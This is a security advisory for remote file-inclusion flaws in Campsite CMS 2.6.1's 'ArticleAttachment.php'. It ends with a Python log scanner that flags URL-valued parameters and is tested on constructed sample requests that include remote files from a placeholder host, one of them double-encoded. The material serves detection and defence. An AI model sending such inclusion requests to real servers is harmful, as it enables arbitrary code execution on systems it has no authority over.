vendor: Campsite CMS
by:
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: Campsite CMS
Affected Version From: Campsite 2.6.1
Affected Version To: Campsite 2.6.1
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
Campsite Multiple Remote File-Include Vulnerabilities
Campsite CMS is prone to multiple remote file-include vulnerabilities caused by insufficient input validation in the 'ArticleAttachment.php' script. A remote attacker can exploit them by sending a specially crafted HTTP request containing a malicious file path to the vulnerable script. Successful exploitation results in the inclusion of the attacker's file, which is then executed in the context of the web server, giving the attacker arbitrary code execution there.
Mitigation:
To mitigate these vulnerabilities, it is recommended to apply the latest patches and updates provided by the vendor. Additionally, it is good security practice to restrict access to the vulnerable script and to implement proper input validation to prevent file inclusion attacks.
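While access to the script is being restricted or its input validation fixed, requests of the kind described above can be flagged in web server access logs. The following is an added example, not code from Campsite or from this advisory. It assumes combined-format access logs. The path prefix, parameter names and sample lines are constructed placeholders, and because the advisory does not name the affected parameter, every query parameter sent to 'ArticleAttachment.php' is checked.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

SCRIPT = "ArticleAttachment.php"  # script named in the advisory
# Value that starts with a URL scheme or stream wrapper (http://, ftp://, php://, data:, //host)
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*://|data:|//)", re.I)
# Request line inside a combined-format access log entry
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode(value, rounds=3):
    """Undo up to `rounds` extra layers of percent-encoding (double-encoding evasion)."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value

def suspicious_params(log_line):
    """Return [(param, decoded_value)] for URL-valued parameters sent to SCRIPT."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    target = urlsplit(m.group(1))
    if not target.path.lower().endswith("/" + SCRIPT.lower()):
        return []
    hits = []
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        value = decode(value)  # parse_qsl already removed one encoding layer
        if REMOTE.match(value):
            hits.append((name, value))
    return hits

# Constructed sample lines; path prefix and parameter names are placeholders.
SAMPLE_LOG = [
    '203.0.113.9 - - [01/Jan/2024:10:00:00 +0000] "GET /campsite/ArticleAttachment.php?p=http%3A%2F%2Fhost.invalid%2Fx.txt HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /campsite/ArticleAttachment.php?p=%2568ttp://host.invalid/x HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /campsite/ArticleAttachment.php?id=42 HTTP/1.1" 200 2048',
    '198.51.100.4 - - [01/Jan/2024:10:02:00 +0000] "GET /campsite/index.php?next=http://host.invalid/ HTTP/1.1" 200 2048',
]

def scan(lines):
    """Return {line_number: hits} for log lines that need review."""
    return {i: h for i, line in enumerate(lines, 1) if (h := suspicious_params(line))}

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG).items():
        print(lineno, hits)
```

Access logs normally record only the query string, so parameters sent in a POST body need the same check at a reverse proxy or WAF that can see the request body.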